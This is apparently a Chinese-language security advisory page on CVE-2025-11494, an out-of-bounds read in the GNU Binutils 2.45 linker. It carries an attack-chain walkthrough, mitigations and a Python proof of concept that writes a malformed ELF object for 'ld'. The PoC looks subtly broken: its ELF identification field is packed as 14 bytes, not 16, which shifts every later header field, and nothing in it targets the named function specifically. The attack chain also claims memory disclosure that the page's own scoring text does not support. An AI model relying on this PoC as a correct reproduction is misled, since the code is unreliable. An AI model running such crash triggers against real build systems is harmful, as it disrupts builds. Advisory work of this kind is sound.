CVE-2025-11494：GNU Binutils 2.45 链接器越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11494

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

GNU Binutils

漏洞概述

CVE-2025-11494 是 GNU Binutils 2.45 版本中链接器（Linker）组件存在的一个安全漏洞。该漏洞位于 bfd/elfxx-x86.c 文件中的 _bfd_x86_elf_late_size_sections 函数中，攻击者可以通过精心构造的 ELF 目标文件触发该函数中的越界读取操作。

GNU Binutils 是一套广泛使用的二进制工具集合，包括链接器（ld）、汇编器（as）、目标文件格式转换工具等，是 GNU 工具链和众多 Linux 发行版的核心组件之一。该漏洞影响 x86 架构下的 ELF 目标文件处理流程，攻击者需要具备本地访问权限且需要低权限认证才能实施攻击。

根据 CVSS 3.1 评分体系，该漏洞评分为 3.3 分，属于低危级别。攻击向量为本地（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。该漏洞主要影响系统的可用性，可能导致链接器进程崩溃或异常终止，但不会直接造成机密性泄露或完整性破坏。

该漏洞的修复补丁已通过 Git 提交 b6ac5a8a5b82f0ae6a4642c8d7149b325f4cc60a 提供，官方建议用户尽快应用补丁进行修复。由于漏洞利用代码已被公开披露，相关系统管理员应提高警惕，及时更新软件版本以防止潜在的安全风险。

技术细节

该漏洞的根本原因在于 _bfd_x86_elf_late_size_sections 函数在处理 x86 架构 ELF 目标文件的节区（section）信息时，未对输入数据进行充分的边界检查。当链接器处理经过恶意构造的 ELF 文件时，函数内部对节区数据的访问可能超出预分配的缓冲区边界，从而触发越界读取操作。

具体而言，_bfd_x86_elf_late_size_sections 函数负责在链接后期计算 x86 ELF 文件中各节区的大小。该函数会遍历目标文件的节区头表（Section Header Table），并根据节区的类型和属性进行相应的处理。如果攻击者构造了一个包含异常节区索引或畸形节区大小信息的 ELF 文件，函数在访问相关数据结构时可能读取到超出缓冲区范围的数据。

漏洞利用方式如下：攻击者首先需要获得目标系统的本地访问权限（低权限即可），然后创建一个经过精心构造的恶意 ELF 目标文件。当系统上的用户或自动化构建系统使用受影响的 GNU Binutils 链接器（ld）处理该文件时，会触发越界读取，可能导致链接器进程崩溃（拒绝服务）或读取到未初始化的内存数据。

值得注意的是，该漏洞属于本地攻击场景，需要攻击者已经在目标系统上拥有一定的访问权限，因此其实际威胁程度相对有限。但由于 GNU Binutils 在软件开发和构建流程中的广泛应用，该漏洞可能影响 CI/CD 管道、自动化构建系统等场景的安全性。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要首先获得目标系统的本地访问权限。由于该漏洞的攻击向量为本地（AV:L），攻击者需要拥有系统账户才能进行后续操作。

STEP 2

步骤2：构造恶意ELF文件

攻击者创建一个经过精心构造的 ELF 目标文件，其中包含异常的节区索引或畸形的节区大小信息，用于触发 _bfd_x86_elf_late_size_sections 函数中的越界读取。

STEP 3

步骤3：诱导链接器处理恶意文件

攻击者通过社会工程学或利用自动化构建系统，诱导受害者使用受影响的 GNU Binutils 链接器（ld）处理恶意 ELF 文件，例如在编译恶意项目时触发。

STEP 4

步骤4：触发越界读取

当链接器处理恶意文件时，_bfd_x86_elf_late_size_sections 函数在访问节区数据时发生越界读取，可能导致链接器进程崩溃（拒绝服务攻击）或读取到敏感内存数据。

STEP 5

步骤5：影响系统可用性

链接器异常终止可能导致构建流程中断，影响软件开发和部署流程。在 CI/CD 环境中，该漏洞可能被利用来破坏自动化构建管道。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11494 PoC - Trigger OOB read in _bfd_x86_elf_late_size_sections
# This PoC creates a malformed ELF object file that triggers the vulnerability
# when processed by GNU Binutils 2.45 ld linker.

import struct
import sys

# ELF64 Header constants for x86-64
ELF_MAGIC = b'\x7fELF'
ELFCLASS64 = 2
ELFDATA2LSB = 1  # Little endian
ET_REL = 1       # Relocatable file (object file)
EM_X86_64 = 62   # x86-64 architecture
EV_CURRENT = 1

def create_malformed_elf(output_path):
    """Create a malformed ELF file to trigger OOB read in _bfd_x86_elf_late_size_sections"""
    
    # ELF64 Header (64 bytes)
    e_ident = ELF_MAGIC + struct.pack('BBBBBxxxxx',
        ELFCLASS64,     # EI_CLASS: 64-bit
        ELFDATA2LSB,    # EI_DATA: Little endian
        EV_CURRENT,     # EI_VERSION
        0,              # EI_OSABI
        0               # EI_ABIVERSION
    )
    
    e_type = ET_REL
    e_machine = EM_X86_64
    e_version = EV_CURRENT
    e_entry = 0
    e_phoff = 0  # No program headers for object file
    e_flags = 0
    e_ehsize = 64
    e_phentsize = 0
    e_phnum = 0
    
    # Place section headers right after ELF header
    e_shoff = 64
    e_shentsize = 64  # Size of section header entry
    
    # Create multiple sections to trigger the vulnerability
    # Include malformed section indices to cause OOB read
    e_shnum = 5  # Number of section headers
    e_shstrndx = 4  # Section header string table index
    
    elf_header = e_ident + struct.pack('<HHIQQQIHHHHHH',
        e_type, e_machine, e_version, e_entry, e_phoff,
        e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum,
        e_shentsize, e_shnum, e_shstrndx
    )
    
    # Section headers
    # SHT_NULL section (index 0)
    sh_null = struct.pack('<IIQQQQIIQQ',
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    )
    
    # Malformed section with abnormal size to trigger OOB
    # This section will cause _bfd_x86_elf_late_size_sections to read out of bounds
    sh_malformed = struct.pack('<IIQQQQIIQQ',
        0,          # sh_name
        1,          # sh_type: SHT_PROGBITS
        0x3,        # sh_flags: SHF_WRITE | SHF_ALLOC
        0,          # sh_addr
        0,          # sh_offset
        0xFFFFFFFF, # sh_size: abnormally large size to trigger OOB read
        0,          # sh_link
        0,          # sh_info
        1,          # sh_addralign
        0           # sh_entsize
    )
    
    # Additional sections
    sh_symtab = struct.pack('<IIQQQQIIQQ',
        0, 2, 0, 0, 0, 0, 0, 0, 0, 0  # SHT_SYMTAB placeholder
    )
    
    sh_strtab = struct.pack('<IIQQQQIIQQ',
        0, 3, 0, 0, 0, 0, 0, 0, 0, 0  # SHT_STRTAB placeholder
    )
    
    # Section string table with names
    strtab_data = b'\x00.malformed\x00.symtab\x00.strtab\x00.shstrtab\x00'
    sh_shstrtab = struct.pack('<IIQQQQIIQQ',
        0, 3, 0, 0, 64 + 5*64, len(strtab_data), 0, 0, 1, 0
    )
    
    # Assemble the file
    elf_data = elf_header + sh_null + sh_malformed + sh_symtab + sh_strtab + sh_shstrtab + strtab_data
    
    with open(output_path, 'wb') as f:
        f.write(elf_data)
    
    print(f"[*] Malformed ELF file created: {output_path}")
    print(f"[*] File size: {len(elf_data)} bytes")
    print(f"[*] Use 'ld' from GNU Binutils 2.45 to trigger the vulnerability:")
    print(f"    ld {output_path} -o /dev/null")

if __name__ == '__main__':
    output = sys.argv[1] if len(sys.argv) > 1 else 'malformed.o'
    create_malformed_elf(output)

影响范围

GNU Binutils 2.45

GNU Binutils < 2.45（可能受影响的早期版本）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制本地用户对链接器（ld）的访问权限，仅允许可信用户执行链接操作；2）在处理不可信来源的 ELF 目标文件时，使用容器或沙箱环境隔离链接过程；3）监控系统日志，关注链接器异常退出或崩溃事件；4）避免在多用户系统中处理未经验证的第三方目标文件；5）关注官方安全公告，及时应用安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11494
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11494
3 Details https://www.cvedetails.com/cve/CVE-2025-11494/
4 VulDB https://vuldb.com/cve/CVE-2025-11494
5 Link https://sourceware.org/bugzilla/attachment.cgi?id=16389
6 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33499
7 Link https://sourceware.org/bugzilla/show_bug.cgi?id=33499#c2
8 Link https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=b6ac5a8a5b82f0ae6a4642c8d7149b325f4cc60a
9 Link https://vuldb.com/?ctiid.327619
10 Link https://vuldb.com/?id.327619
11 Link https://vuldb.com/?submit.668281
12 Link https://www.gnu.org/
13 Link https://cert-portal.siemens.com/productcert/html/ssa-082556.html